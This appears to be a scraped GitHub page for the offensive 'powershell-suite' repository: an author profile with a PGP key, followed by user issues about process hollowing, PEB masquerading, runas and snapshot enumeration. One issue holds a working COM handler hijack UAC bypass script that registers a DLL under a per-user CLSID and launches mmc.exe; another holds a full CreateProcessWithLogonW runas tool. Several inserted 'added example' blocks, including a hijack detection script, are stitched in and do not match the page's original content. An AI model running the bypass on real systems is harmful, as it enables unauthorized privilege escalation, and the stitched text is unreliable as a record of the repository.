
powershell-suite's Introduction

Hey 👋


Each line of arcane script, each cryptogram, speaks of a journey into the labyrinthine architecture of digital unknowns, a deft pursuit amongst the echoes of creation and obliteration. These silent testaments, these repositories, though but a fraction of the cosmos, encapsulate an audacious journey into the nebulous heart of our binary existence, a voyage fuelled by an unquenchable thirst for comprehension, and a relentless desire to decode the indecipherable.

About

  • My areas of focus include Windows internals, .NET cross-platform development, post-exploitation, binary instrumentation, Electron and vulnerability research❗
  • I like working on bizarre research projects across verticals, the more esoteric the better
  • Artisan ☀️, Developer 🌘, Harmonizer ⬆️
  • Certified Windows 🪟 shill, it's just better than what you're running

Reach Out

If you want to reach out securely you can use my GPG key.

-----BEGIN PGP PUBLIC KEY BLOCK-----
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=ZkKB
-----END PGP PUBLIC KEY BLOCK-----

Key metadata:

smart card   D2760001240100000006233501640000 (YubiKey 5)
pub          nistp521 2023-02-07 [SC] [expires: 2025-02-06]
             E21EF757439340B9DEBD7AC6AE48B1EEBCCCACFC
uid          Ruben Boonen (b33f) <[email protected]>
sub          nistp521 2023-02-07 [E]
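Before encrypting to a copy of this key fetched from a keyserver or a web page, pin it against the fingerprint published above. The following is an added example, not part of the profile: it parses gpg's machine-readable output in show-only mode (so nothing enters the keyring until the check passes) and compares the primary-key fingerprint and expiry with the published metadata. The file name b33f.asc is an assumption.

```powershell
# Added example: verify a downloaded key against a published fingerprint using gpg's colon output.
function Test-PublishedGpgKey {
    param(
        [Parameter(Mandatory = $True)] [string]$KeyFile,
        # Fingerprint as printed in the key metadata; whitespace and case are ignored
        [Parameter(Mandatory = $True)] [string]$ExpectedFingerprint
    )
    $expected = ($ExpectedFingerprint -replace '\s', '').ToUpperInvariant()

    # --with-colons records: field 1 = type, field 7 = expiry (epoch seconds),
    # field 10 = fingerprint on 'fpr' lines, field 17 = curve name on 'pub' lines.
    $records = & gpg --with-colons --import-options show-only --import $KeyFile 2>$null
    if ($LASTEXITCODE -ne 0) { throw "gpg could not parse $KeyFile" }

    $pub = $records | Where-Object { $_ -like 'pub:*' } | Select-Object -First 1
    $fpr = $records | Where-Object { $_ -like 'fpr:*' } | Select-Object -First 1  # first fpr belongs to the primary key
    if (-not $pub -or -not $fpr) { throw "no public key record found in $KeyFile" }

    $pubFields = $pub -split ':'
    $actual    = ($fpr -split ':')[9].ToUpperInvariant()
    $expiry    = $null
    if ($pubFields[6] -match '^\d+$') {
        $expiry = [DateTimeOffset]::FromUnixTimeSeconds([long]$pubFields[6]).UtcDateTime
    }

    [pscustomobject]@{
        FingerprintMatches = ($actual -eq $expected)
        Fingerprint        = $actual
        Curve              = $pubFields[16]
        Expires            = $expiry
        Expired            = (($null -ne $expiry) -and ($expiry -lt [DateTime]::UtcNow))
    }
}

# Usage (b33f.asc is the downloaded armored key):
#   Test-PublishedGpgKey -KeyFile .\b33f.asc -ExpectedFingerprint 'E21EF757439340B9DEBD7AC6AE48B1EEBCCCACFC'
```

Only import the key when FingerprintMatches is true and Expired is false; the Curve field should read nistp521 for the key listed above.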


powershell-suite's People

Contributors

fuzzysecurity

powershell-suite's Issues

Start-Hollow not passing environment vars.

Hello,
Executing the Start-Hollow script on any program that needs environment variables (such as PATH) results in an error.

Even running a simple C++ program that shows a message box with environment vars results in empty vars appearing.
Any fix?

COM handler hijack

Hi there. I was wondering if you could give me any tips on making a PowerShell script for this UAC bypass. I've tried to copy the Metasploit module but I've got nowhere.

function ComBypass {
    param(
        [Parameter(Mandatory = $False)]
        [String]$dllFile
    )
    # Per-user class registration for the target CLSID (HKCU\Software\Classes is merged into HKCR)
    $rootKey    = "HKCU:\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}"
    $inproc_key = "$rootKey\InProcServer32"
    $shell_key  = "$rootKey\ShellFolder"
    New-Item $rootKey -Force
    New-Item $inproc_key
    New-Item $shell_key
    # DLL to be loaded as the in-process server for this class
    New-ItemProperty -Path $inproc_key -Name "(Default)" -Value $dllFile
    New-ItemProperty -Path $inproc_key -Name 'ThreadingModel' -Value 'Apartment'
    New-ItemProperty -Path $inproc_key -Name 'LoadWithoutCOM' -Value ''
    New-ItemProperty -Path $shell_key -Name 'HideOnDesktop' -Value ''
    New-ItemProperty -Path $shell_key -Name 'Attributes' -PropertyType 'DWord' -Value 0xf090013d
    # Launch the host that instantiates the class, wait, then remove the registration
    Start-Process -FilePath cmd.exe -ArgumentList "/c mmc.exe CompMgmt.msc" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    Remove-Item -Path $rootKey -Force -Recurse
}
ComBypass -dllFile "C:\cmd.dll"
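The defender's counterpart to the registry writes in this issue, as an added example (not from the issue author or powershell-suite): legitimate COM servers live under HKLM\Software\Classes\CLSID, so an InProcServer32 entry under HKCU\Software\Classes\CLSID that shadows a machine-wide CLSID, points at a DLL outside the Windows directory, or carries the LoadWithoutCOM / ShellFolder markers used above is worth a look. The function name and output fields are this example's own.

```powershell
# Added example: enumerate per-user CLSID overrides and surface the indicators used by COM handler hijacks.
function Get-UserClsidOverride {
    param(
        # Report only CLSIDs that also exist under HKLM, i.e. a per-user key shadowing a machine-wide class
        [switch]$OnlyShadowingMachineKeys
    )
    $hkcuClsid = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $hkcuClsid)) { return @() }

    Get-ChildItem -Path $hkcuClsid -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid  = $_.PSChildName
        $inproc = "$hkcuClsid\$clsid\InProcServer32"
        if (-not (Test-Path $inproc)) { return }      # no in-process server registered: skip this CLSID

        $props    = Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue
        $server   = [string]$props.'(default)'
        $expanded = [Environment]::ExpandEnvironmentVariables($server)
        $shadows  = Test-Path "HKLM:\Software\Classes\CLSID\$clsid"
        if ($OnlyShadowingMachineKeys -and -not $shadows) { return }

        [pscustomobject]@{
            CLSID          = $clsid
            InProcServer32 = $server
            ShadowsHKLM    = $shadows
            OutsideWindir  = -not ($expanded -like "$env:windir\*")
            LoadWithoutCOM = ($null -ne $props.LoadWithoutCOM)
            ShellFolder    = Test-Path "$hkcuClsid\$clsid\ShellFolder"
        }
    }
}

# Usage: list per-user overrides of machine-wide classes whose DLL is not under %windir%
#   Get-UserClsidOverride -OnlyShadowingMachineKeys | Where-Object { $_.OutsideWindir } | Format-Table -AutoSize
```

Run it under the user whose hive you want to inspect; HKCU is per logon session, so a scheduled sweep needs to load each profile's hive or query HKU\<SID>\Software\Classes\CLSID instead.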

Code conversion

Masquerade-PEB

If you don't mind,
I'd like to ask if you can convert it to AutoIt code.
Or,
even a hint.

Will these scripts still run normally?

I can't seem to do anything to get them to work. Whenever I try to execute a script, my PowerShell window just jumps to a new line: no error, nothing. It does nothing. I am running PowerShell as admin and I have the right execution policy, but none of the scripts seem to do anything for me.

Wish: Enumerate Snapshots (available on shared folders)

Hello
Is it possible you can implement this system call (SMB) into PowerShell?
Previous File Version Enumeration: https://msdn.microsoft.com/en-us/library/cc246471.aspx

I found this code that is working: https://github.com/HiraokaHyperTools/EnumerateSnapshots/blob/master/Source.cpp

The expected result would look like this:

@GMT-2018.05.19-16.00.05
@GMT-2018.05.18-16.00.05
@GMT-2018.05.17-16.00.05
@GMT-2018.05.16-16.00.05
@GMT-2018.05.15-16.00.05
@GMT-2018.05.14-16.00.06
@GMT-2018.05.13-16.00.04

I was unable to transform the type definitions to PowerShell.

Thanks for taking a look at this.
Jean-Marc
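The request above is a DeviceIoControl call with FSCTL_SRV_ENUMERATE_SNAPSHOTS (MS-FSCC, control code 0x00144064) on a handle to the share root; the server answers with a SRV_SNAPSHOT_ARRAY: three ULONGs (NumberOfSnapShots, NumberOfSnapShotsReturned, SnapShotArraySize) followed by a UTF-16 multi-string of @GMT-YYYY.MM.DD-HH.MM.SS tokens. The PowerShell below is an added example written for this page, not powershell-suite code and not a port of the linked C++ source; the function name and the share path in the usage line are its own. It handles the truncated first response, in which the server reports how many bytes the full array needs, by retrying once with a buffer of that size.

```powershell
# Added example: enumerate SMB previous-version (shadow copy) tokens for a share with FSCTL_SRV_ENUMERATE_SNAPSHOTS.
function Get-SmbSnapshotToken {
    param(
        [Parameter(Mandatory = $True)]
        [string]$SharePath   # UNC path to the share root, e.g. "\\fileserver\data\"
    )

    if (-not ([System.Management.Automation.PSTypeName]'SnapNative').Type) {
        Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class SnapNative {
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateFileW(string lpFileName, uint dwDesiredAccess, uint dwShareMode,
        IntPtr lpSecurityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool DeviceIoControl(IntPtr hDevice, uint dwIoControlCode, IntPtr lpInBuffer, uint nInBufferSize,
        IntPtr lpOutBuffer, uint nOutBufferSize, out uint lpBytesReturned, IntPtr lpOverlapped);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
"@
    }

    $FSCTL_SRV_ENUMERATE_SNAPSHOTS = 0x00144064   # CTL_CODE(FILE_DEVICE_NETWORK_FILE_SYSTEM, 0x19, METHOD_BUFFERED, FILE_READ_ACCESS)
    $GENERIC_READ = [uint32]2147483648            # 0x80000000 (PowerShell reads that hex literal as a negative Int32)
    $FILE_SHARE_READ_WRITE = 3
    $OPEN_EXISTING = 3
    $FILE_FLAG_BACKUP_SEMANTICS = 0x02000000      # required to open a directory handle

    $hShare = [SnapNative]::CreateFileW($SharePath, $GENERIC_READ, $FILE_SHARE_READ_WRITE, [IntPtr]::Zero,
                                        $OPEN_EXISTING, $FILE_FLAG_BACKUP_SEMANTICS, [IntPtr]::Zero)
    if ($hShare -eq [IntPtr]::new(-1)) {
        throw [System.ComponentModel.Win32Exception]::new([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())
    }

    $headerSize = 12                  # NumberOfSnapShots, NumberOfSnapShotsReturned, SnapShotArraySize
    $bufSize    = $headerSize + 64KB  # generous first attempt
    $buf        = [IntPtr]::Zero
    try {
        for ($attempt = 0; $attempt -lt 2; $attempt++) {
            $buf = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([int]$bufSize)
            [uint32]$bytesReturned = 0
            $ok = [SnapNative]::DeviceIoControl($hShare, $FSCTL_SRV_ENUMERATE_SNAPSHOTS, [IntPtr]::Zero, 0,
                                                $buf, [uint32]$bufSize, [ref]$bytesReturned, [IntPtr]::Zero)
            if (-not $ok) {
                throw [System.ComponentModel.Win32Exception]::new([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())
            }
            $total     = [System.Runtime.InteropServices.Marshal]::ReadInt32($buf, 0)
            $returned  = [System.Runtime.InteropServices.Marshal]::ReadInt32($buf, 4)
            $arraySize = [System.Runtime.InteropServices.Marshal]::ReadInt32($buf, 8)

            if ($total -eq 0) { return @() }
            if ($returned -eq $total) { break }

            # Truncated reply: SnapShotArraySize tells us how many bytes the full token array needs
            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($buf)
            $buf = [IntPtr]::Zero
            $bufSize = $headerSize + $arraySize + 4
        }
        if ($returned -ne $total) { throw "server returned $returned of $total snapshot tokens" }

        # SnapShotMultiSZ: UTF-16LE "@GMT-YYYY.MM.DD-HH.MM.SS" tokens, NUL-separated, double-NUL terminated
        $raw = New-Object byte[] $arraySize
        [System.Runtime.InteropServices.Marshal]::Copy([IntPtr]::Add($buf, $headerSize), $raw, 0, $arraySize)
        [System.Text.Encoding]::Unicode.GetString($raw).Split([char]0) | Where-Object { $_ -ne '' }
    }
    finally {
        if ($buf -ne [IntPtr]::Zero) { [System.Runtime.InteropServices.Marshal]::FreeHGlobal($buf) }
        [SnapNative]::CloseHandle($hShare) | Out-Null
    }
}

# Usage (server and share names are placeholders):
#   Get-SmbSnapshotToken -SharePath '\\fileserver\data\'
```

Each token can be spliced into a path to read that previous version directly, e.g. \\fileserver\data\@GMT-2018.05.19-16.00.05\report.docx, which is also why this call is useful when looking for pre-ransomware copies of files on a share.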

Expect Invoke-Runas.ps1 to output the stdout of the command which we execute

I tried to create a pipe to output the command's stdout.

function Invoke-Runas {

<#
.SYNOPSIS
    Overview:
    
    Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW (also used
	by runas under the hood).
    
    Parameters:
     -User              Specifiy username.
     
     -Password          Specify password.
     
     -Domain            Specify domain. Defaults to localhost if not specified.
     
     -LogonType         dwLogonFlags:
                          0x00000001 --> LOGON_WITH_PROFILE
                                           Log on, then load the user profile in the HKEY_USERS registry
                                           key. The function returns after the profile is loaded.
                                           
                          0x00000002 --> LOGON_NETCREDENTIALS_ONLY (= /netonly)
                                           Log on, but use the specified credentials on the network only.
                                           The new process uses the same token as the caller, but the
                                           system creates a new logon session within LSA, and the process
                                           uses the specified credentials as the default credentials.
     
     -Binary            Full path of the module to be executed.
                       
     -Args              Arguments to pass to the module, e.g. "/c calc.exe". Defaults
                        to $null if not specified.
                       
.DESCRIPTION
	Author: Ruben Boonen (@FuzzySec)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
.EXAMPLE
	Start cmd with a local account
	C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1
	
.EXAMPLE
	Start cmd with remote credentials. Equivalent to "/netonly" in runas.
	C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2
#>

	param (
		[Parameter(Mandatory = $True)]
		[string]$User,
		[Parameter(Mandatory = $True)]
		[string]$Password,
		[Parameter(Mandatory = $False)]
		[string]$Domain=".",
		[Parameter(Mandatory = $True)]
		[string]$Binary,
		[Parameter(Mandatory = $False)]
		[string]$Args=$null,
		[Parameter(Mandatory = $True)]
		[int][ValidateSet(1,2)]
		[string]$LogonType
	)  

	Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
    using Microsoft.Win32.SafeHandles;
	
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess;
		public IntPtr hThread;
		public uint dwProcessId;
		public uint dwThreadId;
	}
	
	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
	public struct STARTUPINFO
	{
		public uint cb;
		public string lpReserved;
		public string lpDesktop;
		public string lpTitle;
		public uint dwX;
		public uint dwY;
		public uint dwXSize;
		public uint dwYSize;
		public uint dwXCountChars;
		public uint dwYCountChars;
		public uint dwFillAttribute;
		public uint dwFlags;
		public short wShowWindow;
		public short cbReserved2;
		public IntPtr lpReserved2;
		public IntPtr hStdInput;
		public IntPtr hStdOutput;
		public IntPtr hStdError;
	}

    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        [MarshalAs(UnmanagedType.Bool)]
        public bool bInheritHandle;
    }

    public enum StdHandle { Stdin = -10, Stdout = -11, Stderr = -12 };

	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
		public static extern bool CreateProcessWithLogonW(
			String userName,
			String domain,
			String password,
			int logonFlags,
			String applicationName,
			String commandLine,
			int creationFlags,
			int environment,
			String currentDirectory,
			ref  STARTUPINFO startupInfo,
			out PROCESS_INFORMATION processInformation);
	}
	
	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool CreatePipe(
            ref IntPtr hReadPipe,
            ref IntPtr hWritePipe,
            IntPtr lpPipeAttributes,
            int nSize);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool SetHandleInformation(
            IntPtr hObject,
            int dwMask,
            int dwFlags);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool CloseHandle(
            IntPtr hObject);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern IntPtr GetStdHandle(
            StdHandle std);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool ReadFile(
            IntPtr hFile,
            [Out] byte[] lpBuffer,
            uint nNumberOfBytesToRead,
            out uint lpNumberOfBytesRead,
            IntPtr lpOverlapped);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool WriteFile(
            IntPtr hFile,
            [In] byte[] lpBuffer,
            int nNumberOfBytesToRead,
            out uint lpNumberOfBytesRead,
            IntPtr lpOverlapped);
	}
"@
    # Anonymous pipe for the child's stdout/stderr. The write end must be inheritable; the read
    # end must not be, otherwise the child inherits it too and EOF never arrives on our side.
    $sa = New-Object SECURITY_ATTRIBUTES
    $sa.nLength = [System.Runtime.InteropServices.Marshal]::SizeOf($sa)
    $sa.lpSecurityDescriptor = [IntPtr]::Zero
    $sa.bInheritHandle = $True
    [IntPtr]$attr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($sa))
    [System.Runtime.InteropServices.Marshal]::StructureToPtr($sa, $attr, $False)
    [IntPtr]$hWrite = [IntPtr]::Zero
    [IntPtr]$hRead = [IntPtr]::Zero
    $CallResult = [Kernel32]::CreatePipe([ref]$hRead, [ref]$hWrite, $attr, 4096)
    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($attr)

    if ($CallResult) {
        # HANDLE_FLAG_INHERIT (0x1): clear it on the read end so only the write end is inherited
        $CallResult = [Kernel32]::SetHandleInformation($hRead, 0x00000001, 0)
    }

    if ($CallResult) {
        # StartupInfo Struct: STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES, SW_SHOWNORMAL
        $StartupInfo = New-Object STARTUPINFO
        $StartupInfo.dwFlags = 0x00000101
        $StartupInfo.wShowWindow = 0x0001
        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo)
        $StartupInfo.hStdOutput = $hWrite
        $StartupInfo.hStdError = $hWrite

        # ProcessInfo Struct
        $ProcessInfo = New-Object PROCESS_INFORMATION

        # CreateProcessWithLogonW --> lpCurrentDirectory
        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

        echo "`n[>] Calling Advapi32::CreateProcessWithLogonW"
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            $User, $Domain, $Password, $LogonType, $Binary,
            $Args, 0x04000000, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
    }

    if (!$CallResult) {
        # The DllImports set SetLastError=true, so Marshal.GetLastWin32Error() holds the failing call's
        # error code; a separate P/Invoke to GetLastError() can return a value clobbered by the runtime.
        $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        echo "`n[!] Mmm, something went wrong! GetLastError returned:"
        echo "==> $((New-Object System.ComponentModel.Win32Exception([int]$LastError)).Message)`n"
    } else {
        echo "`n[+] Success, process details:"
        Get-Process -Id $ProcessInfo.dwProcessId -ErrorAction SilentlyContinue
        [Kernel32]::CloseHandle($ProcessInfo.hProcess) | Out-Null
        [Kernel32]::CloseHandle($ProcessInfo.hThread) | Out-Null
    }

    # Drop our copy of the write end. The child keeps its inherited copy, so ReadFile fails with
    # ERROR_BROKEN_PIPE exactly when the child exits; keeping $hWrite open here makes the loop hang.
    if ($hWrite -ne [IntPtr]::Zero) {
        [Kernel32]::CloseHandle($hWrite) | Out-Null
    }

    if ($CallResult) {
        # Pump the child's output to our own stdout handle
        $chBuf = New-Object Byte[] 4096
        [uint32]$dwRead = 0
        [uint32]$dwWritten = 0
        [IntPtr]$hParentStdOut = [Kernel32]::GetStdHandle([StdHandle]::Stdout)
        for (;;) {
            $bSuccess = [Kernel32]::ReadFile($hRead, $chBuf, 4096, [ref]$dwRead, [IntPtr]::Zero)
            if (!$bSuccess -or ($dwRead -eq 0)) {
                break
            }
            # Short reads are normal on a pipe; only a failed write ends the loop early
            $bSuccess = [Kernel32]::WriteFile($hParentStdOut, $chBuf, $dwRead, [ref]$dwWritten, [IntPtr]::Zero)
            if (!$bSuccess) {
                break
            }
        }
    }

    if ($hRead -ne [IntPtr]::Zero) {
        [Kernel32]::CloseHandle($hRead) | Out-Null
    }
}
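For the LOGON_WITH_PROFILE case (-LogonType 1 above) the hand-rolled pipe is not strictly needed: System.Diagnostics.Process also calls CreateProcessWithLogonW when UserName is set and wires up inheritable pipe handles for redirected stdout/stderr itself. The function below is an added example written for this page, not powershell-suite code; its name and parameters are its own. It does not cover LOGON_NETCREDENTIALS_ONLY, because ProcessStartInfo exposes no /netonly equivalent, so that case still needs the P/Invoke path in the issue.

```powershell
# Added example: run a binary under other credentials and capture its output via ProcessStartInfo.
function Invoke-RunasCaptured {
    param(
        [Parameter(Mandatory = $True)] [string]$User,
        [Parameter(Mandatory = $True)] [securestring]$Password,
        [string]$Domain = '.',
        [Parameter(Mandatory = $True)] [string]$Binary,
        [string]$Arguments = '',
        [switch]$LoadUserProfile      # maps to LOGON_WITH_PROFILE
    )
    $psi = New-Object System.Diagnostics.ProcessStartInfo
    $psi.FileName               = $Binary
    $psi.Arguments              = $Arguments
    $psi.UserName               = $User
    $psi.Domain                 = $Domain
    $psi.Password               = $Password
    $psi.LoadUserProfile        = [bool]$LoadUserProfile
    $psi.UseShellExecute        = $False    # required both for credentials and for redirection
    $psi.RedirectStandardOutput = $True
    $psi.RedirectStandardError  = $True
    $psi.CreateNoWindow         = $True
    # The target account may not be allowed into the caller's current directory; use one every account can read
    $psi.WorkingDirectory       = $env:SystemRoot

    $proc    = [System.Diagnostics.Process]::Start($psi)
    $childId = $proc.Id
    # Drain stderr asynchronously so a chatty child cannot fill one pipe while we block on the other
    $stderrTask = $proc.StandardError.ReadToEndAsync()
    $stdout     = $proc.StandardOutput.ReadToEnd()
    $proc.WaitForExit()

    [pscustomobject]@{
        ProcessId = $childId
        ExitCode  = $proc.ExitCode
        StdOut    = $stdout
        StdErr    = $stderrTask.Result
    }
}

# Usage (SomeAccount is a placeholder; Get-Credential returns the password as a SecureString):
#   $cred = Get-Credential SomeAccount
#   Invoke-RunasCaptured -User $cred.UserName -Password $cred.Password `
#       -Binary C:\Windows\System32\cmd.exe -Arguments '/c whoami /all' -LoadUserProfile
```

On Windows PowerShell this uses the .NET Framework implementation; on PowerShell 7 the same properties work on Windows only, and Password must be a SecureString rather than plain text.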
